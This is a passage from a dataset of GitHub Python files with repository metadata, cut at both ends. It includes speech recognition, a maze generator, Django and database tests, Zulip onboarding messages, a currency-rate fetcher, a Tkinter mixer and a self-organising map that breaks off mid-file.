print(\"なにか話してください\")\n\n while True:\n\n # 音声入力\n r = sr.Recognizer()\n\n #print(sr.Microphone.list_microphone_names())\n #device_index=0\n with sr.Microphone(device_index=3) as source:\n\n audio = r.listen(source)\n\n try:\n # Google Web Speech APIで音声認識 ko-KR en-US ja-JP\n text = r.recognize_google(audio, language=\"ja-JP\")\n\n except sr.UnknownValueError:\n text = None\n print(\"音声を認識できませんでした\")\n\n except sr.RequestError as e:\n text = None\n print(\"音声認識を要求できませんでした: {0}\".format(e))\n\n else:\n time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n formated_time = str(time)\n uniqueId = 'FRIST'\n sio.emit('send-detected-voice', send_detected_voice(text, formated_time, uniqueId))\n\n finally:\n print(text)\n text = None\n\n\nif __name__ == '__main__':\n speech_recognition()\n","repo_name":"taka1109y/univas-ai","sub_path":"SpeechRecognition.py","file_name":"SpeechRecognition.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37611615318","text":"import itertools\r\nimport os\r\nfrom test_seq import run\r\nimport time\r\n# need the train to to return some valus to store in a table \r\n# loop for the layers\r\n\r\ntotal_number = 25\r\nindex = 0\r\nfilepath = \"sample_peaks_4.npy\"\r\nstart = time.time()\r\n# possible size of the number of hidden units \r\nhidden_units = [128,64,32,16,8]\r\nfor layers in range(1,4):\r\n # get every n C r for the hidden units with repeats \r\n combs = list(itertools.combinations(hidden_units,layers))\r\n for num_hidden in combs:\r\n num_hidden = list(num_hidden)\r\n num_hidden_names = \",\".join([str(x) for x in num_hidden])\r\n prefix = f\"layers{len(num_hidden)}\"\r\n print(f\"SequentialModel_{num_hidden_names}\")\r\n run(filepath, prefix, num_hidden, num_epochs=2000, num_random=10)\r\n index +=1\r\n print(f\"Done with: {index}/{total_number}\")\r\nprint(f\"Total Time: {time.time()-start}\")\r\n","repo_name":"noverney/EEG_Dev","sub_path":"run_all_seq.py","file_name":"run_all_seq.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27090339370","text":"import numpy as np\nimport sys\nimport itertools\nimport csv\n\n# star, all edges point inside to center\n\ndef main():\n filename = \"toy1.txt\"\n # the value of n is provided by the filename.txt\n n = 16\n # the value of num_comment is the line of comment at the beginning of the filename\n num_comment = 4\n\n\n with open(filename) as f:\n content = f.readlines()\n\n content = [x.strip() for x in content]\n\n v_from = {}\n\n for line in content[4:]:\n pair = line.split()\n if int(pair[1]) not in v_from:\n v_from[int(pair[1])]=[]\n v_from[int(pair[1])].append(int(pair[0]))\n\n\n v_to = {}\n\n for line in content[4:]:\n pair = line.split()\n if int(pair[0]) not in v_to:\n v_to[int(pair[0])]=[]\n v_to[int(pair[0])].append(int(pair[1]))\n\n\n l = []\n\n del_v_to = []\n for size in list(reversed(list(range(3,21)))):\n #remove list that is already used once\n if(len(del_v_to) != 0):\n #print(del_v_to)\n for item in del_v_to:\n #print(item)\n #print(v_to)\n del v_to[item]\n del_v_to.remove(item)\n\n for item in v_to:\n\n els = [list(x) for x in itertools.combinations(v_to[item], size)]\n #double counting for stars\n if(len(els) != 0): del_v_to.append(item)\n \n #print('els1')\n for it in els:\n mat = np.zeros(n)\n mat[item] = 1\n for i in range(len(it)):\n mat[it[i]] = 1\n\n l.append(mat)\n\n\n print(l)\n with open('toy1_output_s.csv','w') as f:\n writer = csv.writer(f)\n writer.writerows(l)\n\n\nif __name__=='__main__':\n main()\n","repo_name":"NoSegfault/h_m_c_s","sub_path":"data/stars_specific.py","file_name":"stars_specific.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31230534604","text":"\"\"\"Testimony model tests.\"\"\"\nimport showcase_site.models\nfrom showcase_site.factory import TestimonyFactory\nfrom tests.utils import ModelTestCase\n\n\nclass TestimonyTest(ModelTestCase):\n \"\"\"Test the Testimony model.\"\"\"\n\n model = showcase_site.models.Testimony\n field_tests = {\n 'created': {\n 'verbose_name': 'ajouté le',\n },\n 'source': {\n 'max_length': 300,\n },\n 'quote': {\n 'verbose_name': 'citation',\n },\n }\n model_tests = {\n 'verbose_name': 'témoignage',\n 'ordering': ('-created', 'source'),\n }\n\n @classmethod\n def setUpTestData(cls):\n cls.obj: showcase_site.models.Testimony = TestimonyFactory.create()\n\n def test_preview_is_40_characters_max(self):\n quote = self.obj.quote\n max_len = self.obj.PREVIEW_LENGTH\n expected = (len(quote) > max_len) and quote[:max_len] + '...' or quote\n self.assertEqual(expected, self.obj.preview)\n","repo_name":"oser-cs/oser-showcase-backend","sub_path":"project/tests/test_showcase_site/test_testimony.py","file_name":"test_testimony.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29975404720","text":"import random\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Maze:\r\n def __init__(self, width, height):\r\n self.width = width\r\n self.height = height\r\n self.grid = [[1 for _ in range(width)] for _ in range(height)]\r\n self.visited = [[False for _ in range(width)] for _ in range(height)]\r\n self.stack = []\r\n self.current_cell = (0, 0)\r\n self.directions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\r\n\r\n def generate(self):\r\n self.visited[self.current_cell[0]][self.current_cell[1]] = True\r\n self.stack.append(self.current_cell)\r\n while self.stack:\r\n neighbors = []\r\n for direction in self.directions:\r\n x, y = self.current_cell[0] + direction[0], self.current_cell[1] + direction[1]\r\n if 0 <= x < self.height and 0 <= y < self.width and not self.visited[x][y]:\r\n neighbors.append((x, y))\r\n if neighbors:\r\n next_cell = random.choice(neighbors)\r\n self.visited[next_cell[0]][next_cell[1]] = True\r\n self.stack.append(next_cell)\r\n x1, y1 = self.current_cell\r\n x2, y2 = next_cell\r\n self.grid[(x1 + x2) // 2][(y1 + y2) // 2] = 0\r\n self.current_cell = next_cell\r\n else:\r\n self.current_cell = self.stack.pop()\r\n\r\n def show(self):\r\n plt.imshow(self.grid, cmap='gray')\r\n plt.show()\r\n\r\n# Example usage:\r\nmaze = Maze(20, 20)\r\nmaze.generate()\r\nmaze.show()\r\n","repo_name":"SiliconSavant/TerrainGenPy","sub_path":"mazegenerator.py","file_name":"mazegenerator.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30983861504","text":"\"\"\"Sublime Text plugin to remove a folder from a project easily.\"\"\"\n\nimport sublime\nimport sublime_plugin\n\n\nclass ProjectRemoveFolderCommand(sublime_plugin.TextCommand):\n \"\"\"The Sublime Text plugin class.\"\"\"\n\n project_folders = []\n\n def run(self, _):\n \"\"\"Main function which is called when the plugin is activated.\"\"\"\n\n self.project_folders = sublime.active_window().folders()\n\n if not self.project_folders:\n sublime.status_message('There are no folders added to the current window.')\n return\n\n sublime.active_window().show_quick_panel(self.project_folders, self.remove_folder)\n\n def remove_folder(self, folder_index):\n \"\"\"Function which removes the chosen folder from the window.\"\"\"\n\n if folder_index == -1:\n # No folder was chosen\n return\n\n project_data = sublime.active_window().project_data()\n if not project_data:\n sublime.status_message('There are no folders added to the current window.')\n return\n\n # Iterate over a copy of the list\n for folder in list(project_data.get('folders', [])):\n if folder.get('path') == self.project_folders[folder_index]:\n project_data['folders'].remove(folder)\n\n sublime.active_window().set_project_data(project_data)\n sublime.active_window().status_message('\"{}\" removed from project'.format(self.project_folders[folder_index]))\n","repo_name":"Tenzer/ProjectRemoveFolder","sub_path":"ProjectRemoveFolder.py","file_name":"ProjectRemoveFolder.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"506094182","text":"import csv\nimport matplotlib.pyplot as plt\nx = []\ny = []\ncount = 0\nwith open('cwnd_and_t.csv', 'rb') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n if len(row) == 2 and len(row[0]) > 0 and len(row[1]) >0:\n x.append(int(row[0]))\n y.append(int(row[1]))\n\nplt.plot(range(len(y)), y)\n\nplt.show()\n","repo_name":"hellotommmy/cTCP","sub_path":"haha.py","file_name":"haha.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26191088599","text":"from multiprocessing.pool import ThreadPool\nfrom threading import Thread\n\nfrom promise import Promise\nfrom .utils import process\n\n# Necessary for static type checking\nif False: # flake8: noqa\n from typing import Any, Callable, List\n\n\nclass ThreadExecutor(object):\n\n pool = None\n\n def __init__(self, pool=False):\n # type: (bool) -> None\n self.threads = [] # type: List[Thread]\n if pool:\n self.execute = self.execute_in_pool\n self.pool = ThreadPool(processes=pool)\n else:\n self.execute = self.execute_in_thread\n\n def wait_until_finished(self):\n # type: () -> None\n while self.threads:\n threads = self.threads\n self.threads = []\n for thread in threads:\n thread.join()\n\n def clean(self):\n self.threads = []\n\n def execute_in_thread(self, fn, *args, **kwargs):\n # type: (Callable, *Any, **Any) -> Promise\n promise = Promise() # type: ignore\n thread = Thread(target=process, args=(promise, fn, args, kwargs))\n thread.start()\n self.threads.append(thread)\n return promise\n\n def execute_in_pool(self, fn, *args, **kwargs):\n promise = Promise()\n self.pool.map(lambda input: process(*input), [(promise, fn, args, kwargs)])\n return promise\n","repo_name":"graphql-python/graphql-core-legacy","sub_path":"graphql/execution/executors/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"18"} +{"seq_id":"43293064783","text":"# Exercício 035:\n\n# desenvolva um programa que leio o comprimento de três retas e diga ao usuário se elas podem\n# ou não formar um triângulo.\n\nr1 = float(input('Digite o comprimento da primeira reta:'))\nr2 = float(input('Digite o comprimento da segunda reta:'))\nr3 = float(input('Digite o comprimento da terceira reta:'))\nlista = [r1, r2, r3]\nlista_ordenada = sorted(lista)\nif lista_ordenada[0] + lista_ordenada[1] > lista_ordenada[2]:\n print(f'As retas {r1}, {r2} e {r3} conseguem formar um triângulo!')\nelse:\n print(f'As retas {r1}, {r2} e {r3} não conseguem formar um triângulo!')\n","repo_name":"edujsnogueira/Curso-Python-GG","sub_path":"CursoemVideoEx/ex035.py","file_name":"ex035.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40278925259","text":"import pytest\nfrom datetime import datetime\n\nfrom lswf.core.init import sql\nfrom lswf.database import db, File, Directory, SymLink\n\n\nfrom lswf.core.init import init_if_needed\ninit_if_needed()\n\n\ndef test_sym():\n sql('delete from symlink')\n o = SymLink(True, '/to/the', '/tmp/data/')\n db.create(o)\n assert sql('select * from symlink') == \\\n [(1, 1, '/to/the', '/tmp/data/')]\n\n\ndef test_dir():\n sql('delete from directory')\n d = datetime.now()\n o = Directory('/to/the', d, ['moon', 'stars'])\n db.create(o)\n assert sql('select path from directory') == [('/to/the',)]\n\n assert o.key == 1\n\n o.path = 'yo'\n print(o)\n db.update(o)\n assert sql('select path from directory') == [('yo',)]\n key = o.key\n o.key = None\n with pytest.raises(ValueError):\n db.delete(o)\n\n o.key = key\n db.delete(o)\n assert o.key is None\n assert sql('select * from directory') == []\n\n db.update_or_create(o)\n db.update_or_create(o)\n assert o.listdir == ['moon', 'stars']\n assert sql('select listdir from directory') == [('[\"moon\", \"stars\"]',)]\n o.listdir = []\n db.update_or_create(o)\n assert o.listdir == []\n assert sql('select listdir from directory') == [('[]',)]\n\n\ndef test_file():\n sql('delete from file')\n assert sql('select * from file') == []\n\n d = datetime.now()\n o = File('/to/the', d)\n db.create(o)\n assert sql('select path from file') == [('/to/the',)]\n\n assert o.key == 1\n\n o.path = 'yo'\n print(o)\n db.update(o)\n assert sql('select path from file') == [('yo',)]\n key = o.key\n o.key = None\n with pytest.raises(ValueError):\n db.delete(o)\n\n o.key = key\n db.delete(o)\n assert o.key is None\n assert sql('select * from file') == []\n\n db.update_or_create(o)\n db.update_or_create(o)\n o.path = 'pa'\n db.update_or_create(o)\n assert o.path == 'pa'\n o.key = None\n db.update_or_create(o)\n assert len(sql('select * from file')) == 1\n","repo_name":"Pythux/lswf","sub_path":"test/01_model_data_access.py","file_name":"01_model_data_access.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74793139238","text":"\nfrom django.conf import settings\n\nfrom zerver.lib.actions import set_default_streams, bulk_add_subscriptions, \\\n internal_prep_stream_message, internal_send_private_message, \\\n create_stream_if_needed, create_streams_if_needed, do_send_messages, \\\n do_add_reaction_legacy, create_users\nfrom zerver.models import Realm, UserProfile, Message, Reaction, get_system_bot\n\nfrom typing import Any, Dict, List, Mapping, Text\n\ndef setup_realm_internal_bots(realm: Realm) -> None:\n \"\"\"Create this realm's internal bots.\n\n This function is idempotent; it does nothing for a bot that\n already exists.\n \"\"\"\n internal_bots = [(bot['name'], bot['email_template'] % (settings.INTERNAL_BOT_DOMAIN,))\n for bot in settings.REALM_INTERNAL_BOTS]\n create_users(realm, internal_bots, bot_type=UserProfile.DEFAULT_BOT)\n bots = UserProfile.objects.filter(\n realm=realm,\n email__in=[bot_info[1] for bot_info in internal_bots],\n bot_owner__isnull=True\n )\n for bot in bots:\n bot.bot_owner = bot\n bot.save()\n\ndef send_initial_pms(user: UserProfile) -> None:\n organization_setup_text = \"\"\n if user.is_realm_admin:\n help_url = user.realm.uri + \"/help/getting-your-organization-started-with-zulip\"\n organization_setup_text = (\"* [阅读指南](%s) 进入团队 \"\n \"开始使用e建联\\n\" % (help_url,))\n\n content = (\n # \"Hello, and welcome to Zulip!\\n\\nThis is a private message from me, Welcome Bot. \"\n # \"Here are some tips to get you started:\\n\"\n # \"* Download our [Desktop and mobile apps](/apps)\\n\"\n # \"* Customize your account and notifications on your [Settings page](#settings)\\n\"\n # \"* Type `?` to check out Zulip's keyboard shortcuts\\n\"\n # \"%s\"\n # \"\\n\"\n # \"The most important shortcut is `r` to reply.\\n\\n\n # \"Practice sending a few messages by replying to this conversation. If you're not into \"\n # \"keyboards, that's okay too; clicking anywhere on this message will also do the trick!\") \\\n \"欢迎使用e建联!\\n\\n这是[欢迎机器人]发出的私信. \"\n \"这是引导您使用的秘诀:\\n\"\n \"* 去应用商店下载我们的[手机App](/apps)\\n\"\n \"* 去设置页定制您的通知方式\\n\"\n \"* 键`?` 呼出e建联快捷键\\n\"\n \"%s\"\n \"\\n\"\n \"最常用的快捷键用`r` 来回复消息.\\n\\n\"\n \"练练手吧,按`r`来回复本聊天对话.\"\n \"如果您不用键盘,没关系,点击本消息任何地方,能达到同样目的,即回复消息!\") \\\n % (organization_setup_text,)\n\n internal_send_private_message(user.realm, get_system_bot(settings.WELCOME_BOT),\n user, content)\n\ndef setup_initial_streams(realm: Realm) -> None:\n stream_dicts = [\n {'name': \"一般\"},\n {'name': \"新成员\",\n 'description': \"欢迎新成员. 您可以用您的名字作为话题来介绍自己!\"},\n {'name': \"e建联\",\n 'description': \"e建联讨论、秘诀、提问题等等\"}] # type: List[Mapping[str, Any]]\n create_streams_if_needed(realm, stream_dicts)\n set_default_streams(realm, {stream['name']: {} for stream in stream_dicts})\n\ndef send_initial_realm_messages(realm: Realm) -> None:\n welcome_bot = get_system_bot(settings.WELCOME_BOT)\n # Make sure each stream created in the realm creation process has at least one message below\n # Order corresponds to the ordering of the streams on the left sidebar, to make the initial Home\n # view slightly less overwhelming\n welcome_messages = [\n {'stream': Realm.DEFAULT_NOTIFICATION_STREAM_NAME,\n 'topic': \"欢迎\",\n 'content': \"这是群组 `%s` 话题 `欢迎` 的消息. 我们使用这个群组 \"\n \"来放置系统生成的通知.\" % (Realm.DEFAULT_NOTIFICATION_STREAM_NAME,)},\n {'stream': Realm.INITIAL_PRIVATE_STREAM_NAME,\n 'topic': \"私有群组\",\n 'content': \"这是私有群组. 只有管理员和您邀请的人才能看见本群组的存在.\"},\n {'stream': \"会客厅\",\n 'topic': \"welcome\",\n 'content': \"Welcome to #**会客厅**.\"},\n {'stream': \"新成员\",\n 'topic': \"报到\",\n 'content': \"#**新成员** 群组,为新员工报到而设置.\\n\\n如果您不是这里的第一个人而读到本消息 \"\n \"请在用您的名字作为话题名来介绍自己! \"\n \"键入 `c` 或在屏幕下方点击 `新话题` 来开始新话题.\"},\n {'stream': \"e建联\",\n 'topic': \"话题演示\",\n 'content': \"这是一个话题里面的一条消息. 回复本消息将加入本话题.\"},\n {'stream': \"e建联\",\n 'topic': \"话题演示\",\n 'content': \"该话题第二条消息,带这[海龟](/static/images/cute/turtle.png)!\"},\n {'stream': \"e建联\",\n 'topic': \"第二个话题\",\n 'content': \"第二个话题的消息.\\n\\n 话题类似邮件的主题, \"\n \"明天沟通对话都围绕自己的话题. 话题宜短小,两三个词最好!\"},\n ] # type: List[Dict[str, Text]]\n messages = [internal_prep_stream_message(\n realm, welcome_bot,\n message['群组'], message['话题'], message['内容']) for message in welcome_messages]\n message_ids = do_send_messages(messages)\n\n # We find the one of our just-sent messages with turtle.png in it,\n # and react to it. This is a bit hacky, but works and is kinda a\n # 1-off thing.\n turtle_message = Message.objects.get(\n id__in=message_ids,\n subject='话题演示',\n content__icontains='cute/turtle.png')\n do_add_reaction_legacy(welcome_bot, turtle_message, 'turtle')\n","repo_name":"ty-xy/zg13","sub_path":"zerver/lib/onboarding.py","file_name":"onboarding.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18221912493","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClasses and functions related to path structure\n\nCreated on Aug 18 2020\n\n@author: V.R.Marcelino\n\"\"\"\nfrom pathlib import Path\n\n# path to reference databases:\nclass ref_db():\n def __init__(self,blastdb_16Smicro=\"/home/ref_databases/BlastDBs/16SMicrobial/16SMicrobial\",\n blastdb_silva=\"/home/ref_databases/BlastDBs/16S_SILVA_132_NCBI.fna\"):\n\n self.blastdb_16Smicro = blastdb_16Smicro\n self.blastdb_silva = blastdb_silva\n\n\n# folder structure:\nclass amplicon_paths():\n def __init__(self, ab1_collec=\"/mnt/datastore/AMPLICON/AB1\",\n fasta_collec=\"/mnt/datastore/AMPLICON/FASTA\"):\n \n self.ab1_collec = ab1_collec\n self.fasta_collec = fasta_collec\n\n\nclass genome_paths():\n def __init__(self, raw_reads=\"/mnt/datastore/GENOMES/RAW\",\n paired=\"/mnt/datastore/GENOMES/PAIRED\",\n unpaired=\"/mnt/datastore/GENOMES/UNPAIRED\",\n contigs=\"/mnt/datastore/GENOMES/CONTIGS\",\n annotations=\"/mnt/datastore/GENOMES/ANNOTATIONS\"):\n self.raw_reads = raw_reads\n self.paired = paired\n self.unpaired = unpaired\n self.contigs = contigs\n self.annotations = annotations\n\n\n# make folders to store AUSMICC genomes and amplicons\n# similar names to what is found in mba\ndef make_db_folders():\n Path(\"/mnt/datastore/AMPLICON\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/AMPLICON/AB1\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/AMPLICON/FASTA\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/RAW\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/PAIRED\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/UNPAIRED\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/CONTIGS\").mkdir(parents=True, exist_ok=True)\n Path(\"/mnt/datastore/GENOMES/ANNOTATIONS\").mkdir(parents=True, exist_ok=True)\n print (\"\\n Inexistent folders created. \\n\")\n\n\n","repo_name":"vrmarcelino/AusMiCC","sub_path":"ausmicc_scripts/path_structure.py","file_name":"path_structure.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12909996392","text":"import requests\nimport json\n\n\nid_currencie = ['GBPBRL', 'NOKBRL', 'BTCBRL', 'NZDBRL',\n 'CHFBRL', 'ETHBRL', 'DKKBRL', 'COPBRL',\n 'RUBBRL', 'CNYBRL', 'INRBRL', 'MXNBRL', \n 'PLNBRL', 'EURBRL', 'SARBRL', 'TRYBRL',\n 'PYGBRL', 'AEDBRL', 'HKDBRL', 'XRPBRL',\n 'USDBRL', 'CADBRL', 'JPYBRL', 'ILSBRL',\n 'SGDBRL', 'SEKBRL', 'THBBRL', 'PENBRL',\n 'DOGEBRL', 'TWDBRL', 'LTCBRL', 'AUDBRL', \n 'CLPBRL', 'BOBBRL', 'ARSBRL', 'UYUBRL']\n\ncurrencie = requests.get(\"http://economia.awesomeapi.com.br/json/last/GBP-BRL,NOK-BRL,BTC-BRL,NZD-BRL,CHF-BRL,ETH-BRL,DKK-BRL,COP-BRL,RUB-BRL,CNY-BRL,INR-BRL,MXN-BRL,PLN-BRL,EUR-BRL,SAR-BRL,TRY-BRL,PYG-BRL,AED-BRL,HKD-BRL,XRP-BRL,USD-BRL,CAD-BRL,JPY-BRL,ILS-BRL,SGD-BRL,SEK-BRL,THB-BRL,PEN-BRL,DOGE-BRL,TWD-BRL,LTC-BRL,AUD-BRL,CLP-BRL,BOB-BRL,ARS-BRL,UYU-BRL\")\ncurrencie_data = currencie.json()\n\nfor id in id_currencie:\n print(currencie_data[id], \"\\n\")\n","repo_name":"jeffbarreto1/finance-python","sub_path":"currencie.py","file_name":"currencie.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71078189801","text":"#! python3.6\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDocumentation de la classe PresentationTop\n\n Version : 17/04/2020 Équipe ROCCO\n\n\tParticipant:\tMaxence CONAN\n\t\t\t\t\tThibaud BARON\n\n Description :\n Présentation globale de la table de mixage.\n \n Attributs :\n controller : controller de la piste\n topPresentation : topPresentation où sera affichée la présentation de la piste\n \n volumeGlobalSlider : gestion du volume global à l'aide d'un slider\n soundButton : bouton gérant la pause du son\n addChannel : bouton gérant l'ajout de pistes\n saveButton : bouton gérant la sauvegarde les paramètres\n loadButton : bouton gérant le chargement des paramètres\n exportButton : bouton gérant l'exportation d'un fichier\n \n Constructeur :\n PresentationTop(controller, topPresentation)\n \n Méthodes :\n setVolumeGlobalValue(self,volumeValue) : Change la valeur du volume global\n setPlayPauseState(self,playState) : Change l'image du bouton\n modifyVolumeGlobalValue(self,val): Signale le changement de la valeur du volume global\n save_file(self): Signale le début d'une sauvegarde\n load_file(self): Signale le début d'une restauration\n export_file(self): Signale le début d'une exportation\n clickedSoundButton(self): Signale au controller de mute/unmute la piste et met à jour le bouton\n\"\"\"\n\nimport tkinter\nimport os.path\nfrom tkinter import *\n\nclass PresentationTop (Frame):\n\tdef __init__(self, controller, topPresentation):\n\t\tsuper().__init__(topPresentation)\n\t\tself.topPresentation = topPresentation\n\t\tself.controller = controller\n\t\t\n\t\t\n\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\tself.soundButton = Button(self,image=soundOff, command = self.clickedSoundButton )\n\t\tself.soundButton.image = soundOff\n\t\tself.soundButtonState = False\n\t\t\n\t\tself.soundButton.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 2', height = 1 )\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.volumeGlobalSlider = Scale(self , orient=VERTICAL, command = self.modifyVolumeGlobalValue,background=\"white\", troughcolor='#C8C8C8' , activebackground=\"#D9D9D9\",font='Helvetica 12 bold',borderwidth=1 , cursor=\"hand2\" , highlightthickness=0 , width = 20, length = 150 , sliderlength = 40)\n\t\tself.volumeGlobalSlider.config(from_ = 100, to = 0)\n\t\tself.setVolumeGlobalValue(100)\n\t\tself.volumeGlobalSlider.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 8', height = 1 )\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.addChannel = Button(self,text= \"Ajouter une piste\", command=self.controller.addPiste,width=22, height = 2,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.addChannel.pack()\n\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 6', height = 1 )\n\t\tself.spacerLabel.pack()\n\t\t\n\t\tself.saveButton = Button(self,text= \"Sauvegarder les\\nparamètres\",command=self.save_file,width=22 , height = 2 ,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.saveButton.pack()\n\t\t\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 1', height = 1 )\n\t\tself.spacerLabel.pack()\n\n\t\tself.loadButton = Button(self,text= \"Charger de\\nparamètres\",command=self.load_file,width=22 , height = 2 , cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.loadButton.pack()\n\t\t\n\t\tself.spacerLabel = Label(self,text=\"\",background='#FFFFFF', font='Helvetica 6', height = 1 )\n\t\tself.spacerLabel.pack()\n\n\t\tself.exportButton = Button(self,text = \"Exporter\",command=self.export_file,width=22 , height = 2,cursor=\"hand2\", background='#C8C8C8',font=\"Helvetica 12 bold\", activebackground = \"#B9B9B9\")\n\t\tself.exportButton.pack()\n\t\t\n\t\tself.configure(background=\"#FFF\")\n\t\tself.pack(side = LEFT)\n\t\t\n\t\t\n\tdef setVolumeGlobalValue(self,volumeValue) : \n\t\t\"\"\"\n Paramètre(s)\n\t\t-------------\n\t\tvolumeValue : float Valeur du volume de la piste.\n\n\t\t\"\"\"\n\t\tself.volumeGlobalSlider.set(volumeValue)\n\t\t\n\t\t\n\tdef setPlayPauseState(self,playState) : \n\t\t\"\"\"\n Paramètre(s)\n\t\t-------------\n\t\tplayState : boolean état de l'image\n\n\t\t\"\"\"\n\t\tif playState:\n\t\t\tsoundOn=tkinter.PhotoImage(file=\"Images/play.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOn)\n\t\t\tself.soundButton.image = soundOn\n\t\t\tself.soundButtonState = True\n\t\telse:\n\t\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOff)\n\t\t\tself.soundButton.image = soundOff\n\t\t\tself.soundButtonState = False\n\t\t\n\t\"\"\"\n\t----------------------------Signal-----------------------------------------\n\t\"\"\"\n\t\n\tdef modifyVolumeGlobalValue(self,val):\n\t\tself.controller.listenerVolumeGeneral(int(val))\n\t\t\n\tdef save_file(self):\n\t\tself.controller.listenerSave()\n\n\tdef load_file(self):\n\t\tself.controller.listenerLoad()\n\n\tdef export_file(self):\n\t\tself.controller.listenerExport()\n\n\tdef clickedSoundButton(self):\n\t\tif self.soundButtonState:\n\t\t\tsoundOff=tkinter.PhotoImage(file=\"Images/pause.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOff)\n\t\t\tself.soundButton.image = soundOff\n\t\t\tself.soundButtonState = False\n\t\telse:\n\t\t\tsoundOn=tkinter.PhotoImage(file=\"Images/play.png\",master=self.topPresentation)\n\t\t\tself.soundButton.config(image=soundOn)\n\t\t\tself.soundButton.image = soundOn\n\t\t\tself.soundButtonState = True\n\t\tself.controller.listenerPlay(self.soundButtonState)\n","repo_name":"NMingoube/projets-fac","sub_path":"Barbamix/PresentationTop.py","file_name":"PresentationTop.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29073789269","text":"import random\nimport math\n\nclass Node:\n def __init__(self,w):\n self.etiquet = \"*\"\n # self.activ = 0\n self.w = w\n\nclass Bmu:\n def __init__(self,i,j):\n self.ligne = i\n self.colonne = j\n\nclass Network:\n def __init__(self,map_row,map_col,donne_size,moyenne,delai):\n self.col = map_col\n self.row = map_row\n self.size = donne_size\n self.maps = self.set_maps(moyenne,delai)\n self.bmu = []\n\n def set_maps(self,moyenne,delai):\n tab = []\n maps = []\n for i in range(self.row):\n for j in range(self.col): \n for k in range(self.size):\n tab.append(random.uniform(float(moyenne[k])-delai, float(moyenne[k]+delai))) \n maps.append(Node(tab))\n tab = []\n return maps\n\n def get_index(self,index):\n i = int(index/self.col)\n j = index - i*self.col\n return Bmu(i,j)\n\n def get_maps(self,i,j):\n return self.maps[i*self.col +j]\n\n def affiche_network(self):\n s = 0\n g = 0\n o = 0\n for i in range(self.row):\n for j in range(self.col):\n if self.get_maps(i,j).etiquet == \"s\":\n print(\"\\33[31m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n s = s+1\n if self.get_maps(i,j).etiquet == \"g\":\n print(\"\\33[32m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n g = g+1\n if self.get_maps(i,j).etiquet == \"o\":\n print(\"\\33[33m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n o = o+1\n if self.get_maps(i,j).etiquet == \"*\":\n print(\"\\33[37m\",self.get_maps(i,j).etiquet+\"\\33[37m\" ,end=\" \")\n print()\n print(\"\\33[31m s for Iris-versicolor : \",s,\"\\33[37m\")\n 